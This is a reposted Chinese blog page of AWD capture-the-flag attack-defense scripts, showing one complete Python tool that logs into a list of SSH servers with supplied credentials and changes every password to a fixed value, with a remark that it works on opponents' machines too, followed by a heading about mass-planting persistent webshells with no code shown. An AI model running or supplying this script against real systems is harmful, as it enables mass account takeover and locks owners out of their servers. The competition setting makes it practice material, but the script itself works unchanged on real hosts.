碼上快樂

相關內容    簡體    繁體

AWD攻防工具腳本匯總(二)

本文轉載自   查看原文   2019-07-16 00:22   927    CTF筆記/ CTF CTF筆記 CTF題目

情景五:批量修改ssh密碼

拿到官方靶機第一件事改自己機器的ssh密碼,當然也可以改別人的密碼~  

import paramiko
import sys

ssh_clients = []
timeout = 5
new_password = "qing_@3389.."


def get_flag():
    pass


class SSH_Client():
    def __init__(self, host, port, username, password):
        self.is_root = False
        self.host = host
        self.port = port
        self.username = username
        self.password = password
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.ssh.connect(self.host, self.port, self.username, self.password, timeout=timeout)

    def exec_command(self, command):
        stdin, stdout, stderr = self.ssh.exec_command(command)
        return stdin, stdout, stderr

    def change_password(self):
        stdin, stdout, stderr = self.exec_command("passwd")
        if self.username != "root":
            stdin.write("%s\n" % self.password)
        stdin.write("%s\n" % new_password)
        stdin.write("%s\n" % new_password)
        stdout.read()
        if "success" in stderr.read().decode('utf-8'):
            self.password = new_password
            return True
        else:
            return False

    def save_log(self, filename):
        with open(filename, "a+") as f:
            f.write("%s %s %s %s\n" % (self.host, self.port, self.username, self.password))

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage:")
        print("\t python %s [FILENAME]" % (sys.argv[0]))
        exit(1)
    filename = sys.argv[1]
    print(" [+] Loading file : %s" % filename)
    with open(filename) as f:
        for line in f:
            line = line.rstrip("\n")
            data = line.split(" ")
            host = data[0]
            port = int(data[1])
            username = data[2]
            password = data[3]
            print(" [+] Trying login : %s" % host)
            try:
                ssh_client = SSH_Client(host, port, username, password)
            except Exception as e:
                print(" [-] %s" % e)
                continue
            ssh_clients.append(ssh_client)
    print(" [+] Login finished. ")
    print(" [+} Got [%d] clients. " % len(ssh_clients))
    if len(ssh_clients) == 0:
        exit()
    print(" [+] Starting changing password. ")
    for ssh_client in ssh_clients:
        if ssh_client.change_password():
            print(" [+] %s (Success!)" % ssh_client.host)
            ssh_client.save_log("success.log")
        else:
            print(" [+] %s (Failed!)" % ssh_client.host)
    print(" [+] something like interesting!!! ")

 

 

情景六:批量種馬

審計源碼第一件事可能就找到官方的預留后門,開始第一波種馬 ,這里用腳本直接用官方的馬種不死馬

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CTF線下awd攻防文件監控腳本 關於AWD線下攻防的經驗 CTF AWD模式攻防Note AoiAWD--優秀的AWD工具 網站目錄監控腳本,shell,awd用 《網絡攻防技術》黑客與工具 Kali Linux網絡攻防工具 RSA腳本環境配置-攻防世界-OldDriver mySQL常用腳本匯總 Python常見的腳本匯總
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM